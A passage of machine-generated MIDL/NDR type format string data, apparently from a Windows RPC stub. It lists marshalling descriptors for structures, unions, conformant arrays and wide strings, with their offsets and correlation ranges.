/* 6760 */	NdrFcShort( 0x0 ),	/* 0 */
/* 6762 */	0x19,		/* Corr desc:  field pointer, FC_ULONG */
			0x0,		/*  */
/* 6764 */	NdrFcShort( 0x8 ),	/* 8 */
/* 6766 */	NdrFcShort( 0x11 ),	/* Corr flags:  early, */
/* 6768 */	0x1 , /* correlation range */
			0x0,		/* 0 */
/* 6770 */	NdrFcLong( 0x1 ),	/* 1 */
/* 6774 */	NdrFcLong( 0x2710 ),	/* 10000 */
/* 6778 */	NdrFcLong( 0xffffffff ),	/* -1 */
/* 6782 */	NdrFcShort( 0x0 ),	/* Corr flags:  */
/* 6784 */	0x0 ,
			0x0,		/* 0 */
/* 6786 */	NdrFcLong( 0x0 ),	/* 0 */
/* 6790 */	NdrFcLong( 0x0 ),	/* 0 */
/* 6794 */
			0x12, 0x8,	/* FC_UP [simple_pointer] */
/* 6796 */
			0x25,		/* FC_C_WSTRING */
			0x5c,		/* FC_PAD */
/* 6798 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 6800 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 6802 */	NdrFcShort( 0x20 ),	/* 32 */
/* 6804 */	NdrFcShort( 0x0 ),	/* 0 */
/* 6806 */	NdrFcShort( 0xa ),	/* Offset= 10 (6816) */
/* 6808 */	0x36,		/* FC_POINTER */
			0x8,		/* FC_LONG */
/* 6810 */	0x40,		/* FC_STRUCTPAD4 */
			0x36,		/* FC_POINTER */
/* 6812 */	0x8,		/* FC_LONG */
			0x40,		/* FC_STRUCTPAD4 */
/* 6814 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 6816 */
			0x12, 0x8,	/* FC_UP [simple_pointer] */
/* 6818 */
			0x25,		/* FC_C_WSTRING */
			0x5c,		/* FC_PAD */
/* 6820 */
			0x12, 0x20,	/* FC_UP [maybenull_sizeis] */
/* 6822 */	NdrFcShort( 0xffc0 ),	/* Offset= -64 (6758) */
/* 6824 */
			0x11, 0x4,	/* FC_RP [alloced_on_stack] */
/* 6826 */	NdrFcShort( 0x2 ),	/* Offset= 2 (6828) */
/* 6828 */
			0x2b,		/* FC_NON_ENCAPSULATED_UNION */
			0x9,		/* FC_ULONG */
/* 6830 */	0x29,		/* Corr desc:  parameter, FC_ULONG */
			0x54,		/* FC_DEREFERENCE */
/* 6832 */	NdrFcShort( 0x18 ),	/* x86 Stack size/offset = 24 */
/* 6834 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
/* 6836 */	0x0 ,
			0x0,		/* 0 */
/* 6838 */	NdrFcLong( 0x0 ),	/* 0 */
/* 6842 */	NdrFcLong( 0x0 ),	/* 0 */
/* 6846 */	NdrFcShort( 0x2 ),	/* Offset= 2 (6848) */
/* 6848 */	NdrFcShort( 0x18 ),	/* 24 */
/* 6850 */	NdrFcShort( 0x1 ),	/* 1 */
/* 6852 */	NdrFcLong( 0x1 ),	/* 1 */
/* 6856 */	NdrFcShort( 0x2e ),	/* Offset= 46 (6902) */
/* 6858 */	NdrFcShort( 0xffff ),	/* Offset= -1 (6857) */
/* 6860 */
			0x21,		/* FC_BOGUS_ARRAY */
			0x3,		/* 3 */
/* 6862 */	NdrFcShort( 0x0 ),	/* 0 */
/* 6864 */	0x19,		/* Corr desc:  field pointer, FC_ULONG */
			0x0,		/*  */
/* 6866 */	NdrFcShort( 0x0 ),	/* 0 */
/* 6868 */	NdrFcShort( 0x11 ),	/* Corr flags:  early, */
/* 6870 */	0x1 , /* correlation range */
			0x0,		/* 0 */
/* 6872 */	NdrFcLong( 0x0 ),	/* 0 */
/* 6876 */	NdrFcLong( 0x2710 ),	/* 10000 */
/* 6880 */	NdrFcLong( 0xffffffff ),	/* -1 */
/* 6884 */	NdrFcShort( 0x0 ),	/* Corr flags:  */
/* 6886 */	0x0 ,
			0x0,		/* 0 */
/* 6888 */	NdrFcLong( 0x0 ),	/* 0 */
/* 6892 */	NdrFcLong( 0x0 ),	/* 0 */
/* 6896 */	0x4c,		/* FC_EMBEDDED_COMPLEX */
			0x0,		/* 0 */
/* 6898 */	NdrFcShort( 0xf80c ),	/* Offset= -2036 (4862) */
/* 6900 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 6902 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 6904 */	NdrFcShort( 0x18 ),	/* 24 */
/* 6906 */	NdrFcShort( 0x0 ),	/* 0 */
/* 6908 */	NdrFcShort( 0x8 ),	/* Offset= 8 (6916) */
/* 6910 */	0x8,		/* FC_LONG */
			0x40,		/* FC_STRUCTPAD4 */
/* 6912 */	0x36,		/* FC_POINTER */
			0x8,		/* FC_LONG */
/* 6914 */	0x40,		/* FC_STRUCTPAD4 */
			0x5b,		/* FC_END */
/* 6916 */
			0x12, 0x20,	/* FC_UP [maybenull_sizeis] */
/* 6918 */	NdrFcShort( 0xffc6 ),	/* Offset= -58 (6860) */
/* 6920 */
			0x11, 0x0,	/* FC_RP */
/* 6922 */	NdrFcShort( 0x2 ),	/* Offset= 2 (6924) */
/* 6924 */
			0x2b,		/* FC_NON_ENCAPSULATED_UNION */
			0x9,		/* FC_ULONG */
/* 6926 */	0x29,		/* Corr desc:  parameter, FC_ULONG */
			0x0,		/*  */
/* 6928 */	NdrFcShort( 0x8 ),	/* x86 Stack size/offset = 8 */
/* 6930 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
/* 6932 */	0x0 ,
			0x0,		/* 0 */
/* 6934 */	NdrFcLong( 0x0 ),	/* 0 */
/* 6938 */	NdrFcLong( 0x0 ),	/* 0 */
/* 6942 */	NdrFcShort( 0x2 ),	/* Offset= 2 (6944) */
/* 6944 */	NdrFcShort( 0x4 ),	/* 4 */
/* 6946 */	NdrFcShort( 0x1 ),	/* 1 */
/* 6948 */	NdrFcLong( 0x1 ),	/* 1 */
/* 6952 */	NdrFcShort( 0xf240 ),	/* Offset= -3520 (3432) */
/* 6954 */	NdrFcShort( 0xffff ),	/* Offset= -1 (6953) */
/* 6956 */
			0x11, 0x4,	/* FC_RP [alloced_on_stack] */
/* 6958 */	NdrFcShort( 0x2 ),	/* Offset= 2 (6960) */
/* 6960 */
			0x2b,		/* FC_NON_ENCAPSULATED_UNION */
			0x9,		/* FC_ULONG */
/* 6962 */	0x29,		/* Corr desc:  parameter, FC_ULONG */
			0x54,		/* FC_DEREFERENCE */
/* 6964 */	NdrFcShort( 0x18 ),	/* x86 Stack size/offset = 24 */
/* 6966 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
/* 6968 */	0x0 ,
			0x0,		/* 0 */
/* 6970 */	NdrFcLong( 0x0 ),	/* 0 */
/* 6974 */	NdrFcLong( 0x0 ),	/* 0 */
/* 6978 */	NdrFcShort( 0x2 ),	/* Offset= 2 (6980) */
/* 6980 */	NdrFcShort( 0x4 ),	/* 4 */
/* 6982 */	NdrFcShort( 0x1 ),	/* 1 */
/* 6984 */	NdrFcLong( 0x1 ),	/* 1 */
/* 6988 */	NdrFcShort( 0xf21c ),	/* Offset= -3556 (3432) */
/* 6990 */	NdrFcShort( 0xffff ),	/* Offset= -1 (6989) */
/* 6992 */
			0x11, 0x0,	/* FC_RP */
/* 6994 */	NdrFcShort( 0x2 ),	/* Offset= 2 (6996) */
/* 6996 */
			0x2b,		/* FC_NON_ENCAPSULATED_UNION */
			0x9,		/* FC_ULONG */
/* 6998 */	0x29,		/* Corr desc:  parameter, FC_ULONG */
			0x0,		/*  */
/* 7000 */	NdrFcShort( 0x8 ),	/* x86 Stack size/offset = 8 */
/* 7002 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
/* 7004 */	0x0 ,
			0x0,		/* 0 */
/* 7006 */	NdrFcLong( 0x0 ),	/* 0 */
/* 7010 */	NdrFcLong( 0x0 ),	/* 0 */
/* 7014 */	NdrFcShort( 0x2 ),	/* Offset= 2 (7016) */
/* 7016 */	NdrFcShort( 0x20 ),	/* 32 */
/* 7018 */	NdrFcShort( 0x1 ),	/* 1 */
/* 7020 */	NdrFcLong( 0x1 ),	/* 1 */
/* 7024 */	NdrFcShort( 0x4 ),	/* Offset= 4 (7028) */
/* 7026 */	NdrFcShort( 0xffff ),	/* Offset= -1 (7025) */
/* 7028 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 7030 */	NdrFcShort( 0x20 ),	/* 32 */
/* 7032 */	NdrFcShort( 0x0 ),	/* 0 */
/* 7034 */	NdrFcShort( 0xa ),	/* Offset= 10 (7044) */
/* 7036 */	0x8,		/* FC_LONG */
			0x4c,		/* FC_EMBEDDED_COMPLEX */
/* 7038 */	0x0,		/* 0 */
			NdrFcShort( 0xe48d ),	/* Offset= -7027 (12) */
			0x40,		/* FC_STRUCTPAD4 */
/* 7042 */	0x36,		/* FC_POINTER */
			0x5b,		/* FC_END */
/* 7044 */
			0x11, 0x0,	/* FC_RP */
/* 7046 */	NdrFcShort( 0xe51c ),	/* Offset= -6884 (162) */
/* 7048 */
			0x11, 0x4,	/* FC_RP [alloced_on_stack] */
/* 7050 */	NdrFcShort( 0x2 ),	/* Offset= 2 (7052) */
/* 7052 */
			0x2b,		/* FC_NON_ENCAPSULATED_UNION */
			0x9,		/* FC_ULONG */
/* 7054 */	0x29,		/* Corr desc:  parameter, FC_ULONG */
			0x54,		/* FC_DEREFERENCE */
/* 7056 */	NdrFcShort( 0x18 ),	/* x86 Stack size/offset = 24 */
/* 7058 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
/* 7060 */	0x0 ,
			0x0,		/* 0 */
/* 7062 */	NdrFcLong( 0x0 ),	/* 0 */
/* 7066 */	NdrFcLong( 0x0 ),	/* 0 */
/* 7070 */	NdrFcShort( 0x2 ),	/* Offset= 2 (7072) */
/* 7072 */	NdrFcShort( 0x4 ),	/* 4 */
/* 7074 */	NdrFcShort( 0x1 ),	/* 1 */
/* 7076 */	NdrFcLong( 0x1 ),	/* 1 */
/* 7080 */	NdrFcShort( 0xf1c0 ),	/* Offset= -3648 (3432) */
/* 7082 */	NdrFcShort( 0xffff ),	/* Offset= -1 (7081) */
/* 7084 */
			0x11, 0x0,	/* FC_RP */
/* 7086 */	NdrFcShort( 0x2 ),	/* Offset= 2 (7088) */
/* 7088 */
			0x2b,		/* FC_NON_ENCAPSULATED_UNION */
			0x9,		/* FC_ULONG */
/* 7090 */	0x29,		/* Corr desc:  parameter, FC_ULONG */
			0x0,		/*  */
/* 7092 */	NdrFcShort( 0x8 ),	/* x86 Stack size/offset = 8 */
/* 7094 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
/* 7096 */	0x0 ,
			0x0,		/* 0 */
/* 7098 */	NdrFcLong( 0x0 ),	/* 0 */
/* 7102 */	NdrFcLong( 0x0 ),	/* 0 */
/* 7106 */	NdrFcShort( 0x2 ),	/* Offset= 2 (7108) */
/* 7108 */	NdrFcShort( 0x20 ),	/* 32 */
/* 7110 */	NdrFcShort( 0x1 ),	/* 1 */
/* 7112 */	NdrFcLong( 0x1 ),	/* 1 */
/* 7116 */	NdrFcShort( 0x4 ),	/* Offset= 4 (7120) */
/* 7118 */	NdrFcShort( 0xffff ),	/* Offset= -1 (7117) */
/* 7120 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 7122 */	NdrFcShort( 0x20 ),	/* 32 */
/* 7124 */	NdrFcShort( 0x0 ),	/* 0 */
/* 7126 */	NdrFcShort( 0xa ),	/* Offset= 10 (7136) */
/* 7128 */	0x8,		/* FC_LONG */
			0x4c,		/* FC_EMBEDDED_COMPLEX */
/* 7130 */	0x0,		/* 0 */
			NdrFcShort( 0xe431 ),	/* Offset= -7119 (12) */
			0x40,		/* FC_STRUCTPAD4 */
/* 7134 */	0x36,		/* FC_POINTER */
			0x5b,		/* FC_END */
/* 7136 */
			0x12, 0x8,	/* FC_UP [simple_pointer] */
/* 7138 */
			0x25,		/* FC_C_WSTRING */
			0x5c,		/* FC_PAD */
/* 7140 */
			0x11, 0x4,	/* FC_RP [alloced_on_stack] */
/* 7142 */	NdrFcShort( 0x2 ),	/* Offset= 2 (7144) */
/* 7144 */
			0x2b,		/* FC_NON_ENCAPSULATED_UNION */
			0x9,		/* FC_ULONG */
/* 7146 */	0x29,		/* Corr desc:  parameter, FC_ULONG */
			0x54,		/* FC_DEREFERENCE */
/* 7148 */	NdrFcShort( 0x18 ),	/* x86 Stack size/offset = 24 */
/* 7150 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
/* 7152 */	0x0 ,
			0x0,		/* 0 */
/* 7154 */	NdrFcLong( 0x0 ),	/* 0 */
/* 7158 */	NdrFcLong( 0x0 ),	/* 0 */
/* 7162 */	NdrFcShort( 0x2 ),	/* Offset= 2 (7164) */
/* 7164 */	NdrFcShort( 0xc ),	/* 12 */
/* 7166 */	NdrFcShort( 0x1 ),	/* 1 */
/* 7168 */	NdrFcLong( 0x1 ),	/* 1 */
/* 7172 */	NdrFcShort( 0x4 ),	/* Offset= 4 (7176) */
/* 7174 */	NdrFcShort( 0xffff ),	/* Offset= -1 (7173) */
/* 7176 */
			0x15,		/* FC_STRUCT */
			0x3,		/* 3 */
/* 7178 */	NdrFcShort( 0xc ),	/* 12 */
/* 7180 */	0x8,		/* FC_LONG */
			0x8,		/* FC_LONG */
/* 7182 */	0x8,		/* FC_LONG */
			0x5b,		/* FC_END */
/* 7184 */
			0x11, 0x0,	/* FC_RP */
/* 7186 */	NdrFcShort( 0x2 ),	/* Offset= 2 (7188) */
/* 7188 */
			0x2b,		/* FC_NON_ENCAPSULATED_UNION */
			0x9,		/* FC_ULONG */
/* 7190 */	0x29,		/* Corr desc:  parameter, FC_ULONG */
			0x0,		/*  */
/* 7192 */	NdrFcShort( 0x8 ),	/* x86 Stack size/offset = 8 */
/* 7194 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
/* 7196 */	0x0 ,
			0x0,		/* 0 */
/* 7198 */	NdrFcLong( 0x0 ),	/* 0 */
/* 7202 */	NdrFcLong( 0x0 ),	/* 0 */
/* 7206 */	NdrFcShort( 0x2 ),	/* Offset= 2 (7208) */
/* 7208 */	NdrFcShort( 0x10 ),	/* 16 */
/* 7210 */	NdrFcShort( 0x1 ),	/* 1 */
/* 7212 */	NdrFcLong( 0x1 ),	/* 1 */
/* 7216 */	NdrFcShort( 0x4 ),	/* Offset= 4 (7220) */
/* 7218 */	NdrFcShort( 0xffff ),	/* Offset= -1 (7217) */
/* 7220 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 7222 */	NdrFcShort( 0x10 ),	/* 16 */
/* 7224 */	NdrFcShort( 0x0 ),	/* 0 */
/* 7226 */	NdrFcShort( 0x6 ),	/* Offset= 6 (7232) */
/* 7228 */	0x36,		/* FC_POINTER */
			0x36,		/* FC_POINTER */
/* 7230 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 7232 */
			0x12, 0x8,	/* FC_UP [simple_pointer] */
/* 7234 */
			0x25,		/* FC_C_WSTRING */
			0x5c,		/* FC_PAD */
/* 7236 */
			0x12, 0x8,	/* FC_UP [simple_pointer] */
/* 7238 */
			0x25,		/* FC_C_WSTRING */
			0x5c,		/* FC_PAD */
/* 7240 */
			0x11, 0x4,	/* FC_RP [alloced_on_stack] */
/* 7242 */	NdrFcShort( 0x2 ),	/* Offset= 2 (7244) */
/* 7244 */
			0x2b,		/* FC_NON_ENCAPSULATED_UNION */
			0x9,		/* FC_ULONG */
/* 7246 */	0x29,		/* Corr desc:  parameter, FC_ULONG */
			0x54,		/* FC_DEREFERENCE */
/* 7248 */	NdrFcShort( 0x18 ),	/* x86 Stack size/offset = 24 */
/* 7250 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
/* 7252 */	0x0 ,
			0x0,		/* 0 */
/* 7254 */	NdrFcLong( 0x0 ),	/* 0 */
/* 7258 */	NdrFcLong( 0x0 ),	/* 0 */
/* 7262 */	NdrFcShort( 0x2 ),	/* Offset= 2 (7264) */
/* 7264 */	NdrFcShort( 0x20 ),	/* 32 */
/* 7266 */	NdrFcShort( 0x1 ),	/* 1 */
/* 7268 */	NdrFcLong( 0x1 ),	/* 1 */
/* 7272 */	NdrFcShort( 0x1a ),	/* Offset= 26 (7298) */
/* 7274 */	NdrFcShort( 0xffff ),	/* Offset= -1 (7273) */
/* 7276 */
			0x1b,		/* FC_CARRAY */
			0x1,		/* 1 */
/* 7278 */	NdrFcShort( 0x2 ),	/* 2 */
/* 7280 */	0x19,		/* Corr desc:  field pointer, FC_ULONG */
			0x0,		/*  */
/* 7282 */	NdrFcShort( 0x10 ),	/* 16 */
/* 7284 */	NdrFcShort( 0x11 ),	/* Corr flags:  early, */
/* 7286 */	0x1 , /* correlation range */
			0x0,		/* 0 */
/* 7288 */	NdrFcLong( 0x0 ),	/* 0 */
/* 7292 */	NdrFcLong( 0x400 ),	/* 1024 */
/* 7296 */	0x5,		/* FC_WCHAR */
			0x5b,		/* FC_END */
/* 7298 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 7300 */	NdrFcShort( 0x20 ),	/* 32 */
/* 7302 */	NdrFcShort( 0x0 ),	/* 0 */
/* 7304 */	NdrFcShort( 0x8 ),	/* Offset= 8 (7312) */
/* 7306 */	0x36,		/* FC_POINTER */
			0x36,		/* FC_POINTER */
/* 7308 */	0x8,		/* FC_LONG */
			0x40,		/* FC_STRUCTPAD4 */
/* 7310 */	0x36,		/* FC_POINTER */
			0x5b,		/* FC_END */
/* 7312 */
			0x12, 0x8,	/* FC_UP [simple_pointer] */
/* 7314 */
			0x25,		/* FC_C_WSTRING */
			0x5c,		/* FC_PAD */
/* 7316 */
			0x12, 0x8,	/* FC_UP [simple_pointer] */
/* 7318 */
			0x25,		/* FC_C_WSTRING */
			0x5c,		/* FC_PAD */
/* 7320 */
			0x12, 0x20,	/* FC_UP [maybenull_sizeis] */
/* 7322 */	NdrFcShort( 0xffd2 ),	/* Offset= -46 (7276) */
/* 7324 */
			0x11, 0x0,	/* FC_RP */
/* 7326 */	NdrFcShort( 0x2 ),	/* Offset= 2 (7328) */
/* 7328 */
			0x2b,		/* FC_NON_ENCAPSULATED_UNION */
			0x9,		/* FC_ULONG */
/* 7330 */	0x29,		/* Corr desc:  parameter, FC_ULONG */
			0x0,		/*  */
/* 7332 */	NdrFcShort( 0x8 ),	/* x86 Stack size/offset = 8 */
/* 7334 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
/* 7336 */	0x0 ,
			0x0,		/* 0 */
/* 7338 */	NdrFcLong( 0x0 ),	/* 0 */
/* 7342 */	NdrFcLong( 0x0 ),	/* 0 */
/* 7346 */	NdrFcShort( 0x2 ),	/* Offset= 2 (7348) */
/* 7348 */	NdrFcShort( 0x18 ),	/* 24 */
/* 7350 */	NdrFcShort( 0x1 ),	/* 1 */
/* 7352 */	NdrFcLong( 0x1 ),	/* 1 */
/* 7356 */	NdrFcShort( 0x1a ),	/* Offset= 26 (7382) */
/* 7358 */	NdrFcShort( 0xffff ),	/* Offset= -1 (7357) */
/* 7360 */
			0x1b,		/* FC_CARRAY */
			0x0,		/* 0 */
/* 7362 */	NdrFcShort( 0x1 ),	/* 1 */
/* 7364 */	0x19,		/* Corr desc:  field pointer, FC_ULONG */
			0x0,		/*  */
/* 7366 */	NdrFcShort( 0x8 ),	/* 8 */
/* 7368 */	NdrFcShort( 0x11 ),	/* Corr flags:  early, */
/* 7370 */	0x1 , /* correlation range */
			0x0,		/* 0 */
/* 7372 */	NdrFcLong( 0x0 ),	/* 0 */
/* 7376 */	NdrFcLong( 0xffff ),	/* 65535 */
/* 7380 */	0x2,		/* FC_CHAR */
			0x5b,		/* FC_END */
/* 7382 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 7384 */	NdrFcShort( 0x18 ),	/* 24 */
/* 7386 */	NdrFcShort( 0x0 ),	/* 0 */
/* 7388 */	NdrFcShort( 0x8 ),	/* Offset= 8 (7396) */
/* 7390 */	0x36,		/* FC_POINTER */
			0x8,		/* FC_LONG */
/* 7392 */	0x40,		/* FC_STRUCTPAD4 */
			0x36,		/* FC_POINTER */
/* 7394 */	0x5c,		/* FC_PAD */
			0x5b,		/* FC_END */
/* 7396 */
			0x12, 0x8,	/* FC_UP [simple_pointer] */
/* 7398 */
			0x25,		/* FC_C_WSTRING */
			0x5c,		/* FC_PAD */
/* 7400 */
			0x12, 0x20,	/* FC_UP [maybenull_sizeis] */
/* 7402 */	NdrFcShort( 0xffd6 ),	/* Offset= -42 (7360) */
/* 7404 */
			0x11, 0x4,	/* FC_RP [alloced_on_stack] */
/* 7406 */	NdrFcShort( 0x2 ),	/* Offset= 2 (7408) */
/* 7408 */
			0x2b,		/* FC_NON_ENCAPSULATED_UNION */
			0x9,		/* FC_ULONG */
/* 7410 */	0x29,		/* Corr desc:  parameter, FC_ULONG */
			0x54,		/* FC_DEREFERENCE */
/* 7412 */	NdrFcShort( 0x18 ),	/* x86 Stack size/offset = 24 */
/* 7414 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
/* 7416 */	0x0 ,
			0x0,		/* 0 */
/* 7418 */	NdrFcLong( 0x0 ),	/* 0 */
/* 7422 */	NdrFcLong( 0x0 ),	/* 0 */
/* 7426 */	NdrFcShort( 0x2 ),	/* Offset= 2 (7428) */
/* 7428 */	NdrFcShort( 0x4 ),	/* 4 */
/* 7430 */	NdrFcShort( 0x1 ),	/* 1 */
/* 7432 */	NdrFcLong( 0x1 ),	/* 1 */
/* 7436 */	NdrFcShort( 0xf05c ),	/* Offset= -4004 (3432) */
/* 7438 */	NdrFcShort( 0xffff ),	/* Offset= -1 (7437) */
/* 7440 */
			0x11, 0x0,	/* FC_RP */
/* 7442 */	NdrFcShort( 0x2 ),	/* Offset= 2 (7444) */
/* 7444 */
			0x2b,		/* FC_NON_ENCAPSULATED_UNION */
			0x9,		/* FC_ULONG */
/* 7446 */	0x29,		/* Corr desc:  parameter, FC_ULONG */
			0x0,		/*  */
/* 7448 */	NdrFcShort( 0x8 ),	/* x86 Stack size/offset = 8 */
/* 7450 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
/* 7452 */	0x0 ,
			0x0,		/* 0 */
/* 7454 */	NdrFcLong( 0x0 ),	/* 0 */
/* 7458 */	NdrFcLong( 0x0 ),	/* 0 */
/* 7462 */	NdrFcShort( 0x2 ),	/* Offset= 2 (7464) */
/* 7464 */	NdrFcShort( 0x8 ),	/* 8 */
/* 7466 */	NdrFcShort( 0x1 ),	/* 1 */
/* 7468 */	NdrFcLong( 0x1 ),	/* 1 */
/* 7472 */	NdrFcShort( 0x4 ),	/* Offset= 4 (7476) */
/* 7474 */	NdrFcShort( 0xffff ),	/* Offset= -1 (7473) */
/* 7476 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 7478 */	NdrFcShort( 0x8 ),	/* 8 */
/* 7480 */	NdrFcShort( 0x0 ),	/* 0 */
/* 7482 */	NdrFcShort( 0x4 ),	/* Offset= 4 (7486) */
/* 7484 */	0x36,		/* FC_POINTER */
			0x5b,		/* FC_END */
/* 7486 */
			0x12, 0x8,	/* FC_UP [simple_pointer] */
/* 7488 */
			0x25,		/* FC_C_WSTRING */
			0x5c,		/* FC_PAD */
/* 7490 */
			0x11, 0x4,	/* FC_RP [alloced_on_stack] */
/* 7492 */	NdrFcShort( 0x2 ),	/* Offset= 2 (7494) */
/* 7494 */
			0x2b,		/* FC_NON_ENCAPSULATED_UNION */
			0x9,		/* FC_ULONG */
/* 7496 */	0x29,		/* Corr desc:  parameter, FC_ULONG */
			0x54,		/* FC_DEREFERENCE */
/* 7498 */	NdrFcShort( 0x18 ),	/* x86 Stack size/offset = 24 */
/* 7500 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
/* 7502 */	0x0 ,
			0x0,		/* 0 */
/* 7504 */	NdrFcLong( 0x0 ),	/* 0 */
/* 7508 */	NdrFcLong( 0x0 ),	/* 0 */
/* 7512 */	NdrFcShort( 0x2 ),	/* Offset= 2 (7514) */
/* 7514 */	NdrFcShort( 0x10 ),	/* 16 */
/* 7516 */	NdrFcShort( 0x1 ),	/* 1 */
/* 7518 */	NdrFcLong( 0x1 ),	/* 1 */
/* 7522 */	NdrFcShort( 0x1a ),	/* Offset= 26 (7548) */
/* 7524 */	NdrFcShort( 0xffff ),	/* Offset= -1 (7523) */
/* 7526 */
			0x1b,		/* FC_CARRAY */
			0x0,		/* 0 */
/* 7528 */	NdrFcShort( 0x1 ),	/* 1 */
/* 7530 */	0x19,		/* Corr desc:  field pointer, FC_ULONG */
			0x0,		/*  */
/* 7532 */	NdrFcShort( 0x4 ),	/* 4 */
/* 7534 */	NdrFcShort( 0x11 ),	/* Corr flags:  early, */
/* 7536 */	0x1 , /* correlation range */
			0x0,		/* 0 */
/* 7538 */	NdrFcLong( 0x0 ),	/* 0 */
/* 7542 */	NdrFcLong( 0xffff ),	/* 65535 */
/* 7546 */	0x2,		/* FC_CHAR */
			0x5b,		/* FC_END */
/* 7548 */
			0x1a,		/* FC_BOGUS_STRUCT */
			0x3,		/* 3 */
/* 7550 */	NdrFcShort( 0x10 ),	/* 16 */
/* 7552 */	NdrFcShort( 0x0 ),	/* 0 */
/* 7554 */	NdrFcShort( 0x6 ),	/* Offset= 6 (7560) */
/* 7556 */	0x8,		/* FC_LONG */
			0x8,		/* FC_LONG */
/* 7558 */	0x36,		/* FC_POINTER */
			0x5b,		/* FC_END */
/* 7560 */
			0x12, 0x20,	/* FC_UP [maybenull_sizeis] */
/* 7562 */	NdrFcShort( 0xffdc ),	/* Offset= -36 (7526) */
/* 7564 */
			0x11, 0x0,	/* FC_RP */
/* 7566 */	NdrFcShort( 0x2 ),	/* Offset= 2 (7568) */
/* 7568 */
			0x2b,		/* FC_NON_ENCAPSULATED_UNION */
			0x9,		/* FC_ULONG */
/* 7570 */	0x29,		/* Corr desc:  parameter, FC_ULONG */
			0x0,		/*  */
/* 7572 */	NdrFcShort( 0x8 ),	/* x86 Stack size/offset = 8 */
/* 7574 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
/* 7576 */	0x0 ,
			0x0,		/* 0 */
/* 7578 */	NdrFcLong( 0x0 ),	/* 0 */
/* 7582 */	NdrFcLong( 0x0 ),	/* 0 */
/* 7586 */	NdrFcShort( 0x2 ),	/* Offset= 2 (7588) */
/* 7588 */	NdrFcShort( 0x4 ),	/* 4 */
/* 7590 */	NdrFcShort( 0x1 ),	/* 1 */
/* 7592 */	NdrFcLong( 0x1 ),	/* 1 */
/* 7596 */	NdrFcShort( 0xefbc ),	/* Offset= -4164 (3432) */
/* 7598 */	NdrFcShort( 0xffff ),	/* Offset= -1 (7597) */
/* 7600 */
			0x11, 0x0,	/* FC_RP */
/* 7602 */	NdrFcShort( 0x2 ),	/* Offset= 2 (7604) */
/* 7604 */
			0x2b,		/* FC_NON_ENCAPSULATED_UNION */
			0x9,		/* FC_ULONG */
/* 7606 */	0x29,		/* Corr desc:  parameter, FC_ULONG */
			0x54,		/* FC_DEREFERENCE */
/* 7608 */	NdrFcShort( 0x18 ),	/* x86 Stack size/offset = 24 */
/* 7610 */	NdrFcShort( 0x1 ),	/* Corr flags:  early, */
/* 7612 */	0x0 ,
			0x0,		/* 0 */
/* 7614 */	NdrFcLong( 0x0 ),	/* 0 */
/* 7618 */	NdrFcLong( 0x0 ),	/* 0 */
/* 7622 */	NdrFcShort( 0x2 ),	/* Offset= 2 (7624) */
/* 7624 */	NdrFcShort( 0x40 ),	/* 64 */
/* 7626 */	NdrFcShort( 0x1 ),	/* 1 */
/* 7628 */	NdrFcLong( 0x1 ),	/* 1 */
/* 7632 */	NdrFcShort( 0x46 ),	/* Offset= 70 (7702) */
/* 7634 */	NdrFcShort( 0xffff ),	/* Offset= -1 (7633) */
/* 7636 */
			0x1b,		/* FC_CARRAY */
			0x0,		/* 0 */
/* 7638 */	NdrFcShort( 0x1 ),	/* 1 */
/* 7640 */	0x19,		/* Corr desc:  field pointer, FC_ULONG */
			0x0,		/*  */
/* 7642 */	NdrFcShort( 0x10 ),	/* 16 */
/* 7644 */	NdrFcShort( 0x11 ),	/* Corr flags:  early, */
/* 7646 */	0x1 , /* correlation range */
			0x0,		/* 0 */
/* 7648 */	NdrFcLong( 0x0 ),	/* 0 */
/* 7652 */	NdrFcLong( 0x400 ),	/* 1024 */
/* 7656 */	0x2,		/* FC_CHAR */
			0x5b,		/* FC_END */
/* 7658 */
			0x1b,		/* FC_CARRAY */
			0x0,		/* 0 */
/* 7660 */	NdrFcShort( 0x1 ),	/* 1 */
/* 7662 */	0x19,		/* Corr desc:  field pointer, FC_ULONG */
			0x0,		/*  */
/* 7664 */	NdrFcShort( 0x20 ),	/* 32 */
/* 7666 */	NdrFcShort( 0x11 ),	/* Corr flags:  early, */
/* 7668 */	0x1 , /* correlation range */
			0x0,		/* 0 */
/* 7670 */	NdrFcLong( 0x0 ),	/* 0 */
/* 7674 */	NdrFcLong( 0xa00000 ),	/* 10485760 */
/* 7678 */	0x2,		/* FC_CHAR */
			0x5b,		/* FC_END */
/* 7680 */
			0x1b,		/* FC_CARRAY */
			0x0,		/* 0 */
/* 7682 */	NdrFcShort( 0x1 ),	/* 1 */
/* 7684 */	0x19,		/* Corr desc:  field pointer, FC_ULONG */
			0x0,		/*  */
/* 7686 */	NdrFcShort( 0x30 ),	/* 48 */
/* 7688 */	NdrFcShort( 0x11 ),	/* Corr flags:  early, */
/* 7690 */	0x1 , /* correlation range */
			0x0,		/* 0 */
/* 7692 */	NdrFcLong( 0x0 ),	/* 0 */
